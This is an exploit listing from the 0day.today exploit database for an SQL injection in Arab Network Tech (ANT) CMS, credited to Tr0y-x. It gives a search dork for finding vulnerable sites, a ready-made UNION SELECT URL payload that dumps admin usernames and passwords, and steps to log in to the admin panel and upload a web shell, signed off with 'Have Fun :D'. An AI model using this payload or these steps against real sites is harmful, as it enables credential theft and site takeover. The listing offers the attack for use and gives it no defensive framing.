[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

Arab Network Tech. (ANT) CMS SQL Injection

Author
Tr0y-x
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-10771
Category
web applications
Date add
06-02-2010
Platform
unsorted
==========================================
Arab Network Tech. (ANT) CMS SQL Injection
==========================================

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
 
:::::::::::::::::::::::::
 
Exploit Title : Arab Network Tech. (ANT) CMS SQL Injection
 
Author : Tr0y-x
 
Script Site : www.antpage.com<http://www.antpage.com/>
 
Version : All Versions
 
Tested on : Windows & Linux
 
Dork : inurl:apages.php

:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
 
:::::::::::::::::::::::::
 
=====================================Exploit===============
 
=========================
 
www.[Server}.com/[Path]/[SQL<http://www.[server%7d.com/[Path]/[SQL>]
 
Example
 
www.[Server}.com/[Path]/apages.php?sgroup<http://www.[server%7d.com/[Path]/apages.php?sgroup>=-
 
10+UniOn+AlL+SeLeCt+1,2,concat
 
(username,0x3a,password,0x3a),4,5,6,7,8,9,10+from+admins--
 
Then Go to Admin panel Default www.[Server}.com/<http://www.[server%7d.com/>
 
[Path]/admin
 
And Upload Shell xD
 
Have Fun :D



#  0day.today [2024-11-15]  #